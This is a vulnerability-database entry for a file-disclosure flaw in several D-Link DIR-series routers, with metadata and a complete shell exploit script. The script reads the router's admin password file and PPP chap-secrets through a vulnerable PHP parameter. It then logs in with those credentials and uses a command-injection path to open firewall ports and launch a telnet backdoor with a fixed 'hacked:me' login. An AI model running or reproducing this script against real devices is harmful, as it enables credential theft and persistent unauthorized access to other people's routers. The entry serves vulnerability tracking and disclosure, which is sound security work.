ID
VAR-E-201312-0081
EDB ID
38853
TITLE
D-Link DIR-Series Routers - '/model/__show_info.php' Local File Disclosure - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
D-Link DIR-Series Routers - '/model/__show_info.php' Local File Disclosure. CVE-100579 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | d link | model: | dir-series routers | scope: | - | version: | - | Trust: 1.0 |
| vendor: | d link | model: | dir-615 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | d link | model: | dir-600 2.17b01 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dir-600 2.16b01 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dir-600 2.14b01 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dir-600 2.13b01 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dir-600 2.12b02 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dir-600 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | d link | model: | dir-300 revb 2.14b01 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dir-300 revb | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | d link | model: | dir-300 | scope: | eq | version: | 2.13 | Trust: 0.3 |
| vendor: | d link | model: | dir-300 | scope: | eq | version: | 2.12 | Trust: 0.3 |
| vendor: | d link | model: | dir-300 2.05b03 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dir-300 | scope: | eq | version: | 2.04 | Trust: 0.3 |
| vendor: | d link | model: | dir-300 2.01b1 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dir-300 | scope: | eq | version: | 1.3 | Trust: 0.3 |
| vendor: | d link | model: | dir-300 1.05b09 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dir-300 | scope: | eq | version: | 1.05 | Trust: 0.3 |
| vendor: | d link | model: | dir-300 | scope: | eq | version: | 1.04 | Trust: 0.3 |
| vendor: | d link | model: | dir-300 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/64043/info
Multiple D-Link DIR series routers are prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on devices running the vulnerable application. This may aid in further attacks.
#!/bin/sh
if [ -z "$1" ]; then
echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
echo "usage: $0 [router address] [telnet port]";
exit 0;
fi;
if [ -z "$2" ]; then
TPORT=3333;
else
TPORT=$2;
fi
UPORT=31337;
echo "Trying $1 ...";
HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd"; | grep -A1 "<center>" | tail -1 |
sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`;
if [ ! -z "$HTTPASSWD" ]; then
L=`echo $HTTPASSWD | cut -d' ' -f1`;
P=`echo $HTTPASSWD | cut -d' ' -f2`;
echo "found username: $L";
echo "found password: $P";
curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php"; | grep -v "fail"
1>/dev/null;
if [ $? -eq 0 ]; then
curl -sS
"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
curl -sS
"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i
eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null;
curl -sS
"http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd -p $TPORT -l
/usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null;
echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
curl -sS "http://$1/logout.php"; 1>/dev/null;
fi
fi
CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets"; | grep -A1 "<center>" | sed -e
"s/<center>//g"`;
if [ ! -z "$CHAP" ]; then
echo "found chap-secrets: $CHAP";
fi
echo "Bye bye.";
exit 0;
Trust: 1.0
EXPLOIT LANGUAGE
sh
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'/model/__show_info.php' Local File Disclosure
Trust: 1.0
CREDITS
tytusromekiatomek
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 38853 | Trust: 1.9 |
| db: | BID | id: | 64043 | Trust: 1.9 |
| db: | EDBNET | id: | 59887 | Trust: 0.6 |
REFERENCES
| url: | https://www.securityfocus.com/bid/64043/info | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/38853/ | Trust: 0.6 |
| url: | http://seclists.org/fulldisclosure/2013/dec/6 | Trust: 0.3 |
| url: | http://www.dlink.com/ | Trust: 0.3 |
| url: | https://www.exploit-db.com/exploits/38853 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 64043 |
| db: | EXPLOIT-DB | id: | 38853 |
| db: | EDBNET | id: | 59887 |
LAST UPDATE DATE
2022-07-27T09:37:58.619000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 64043 | date: | 2013-12-02T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 64043 | date: | 2013-12-02T00:00:00 |
| db: | EXPLOIT-DB | id: | 38853 | date: | 2013-12-02T00:00:00 |
| db: | EDBNET | id: | 59887 | date: | 2013-12-02T00:00:00 |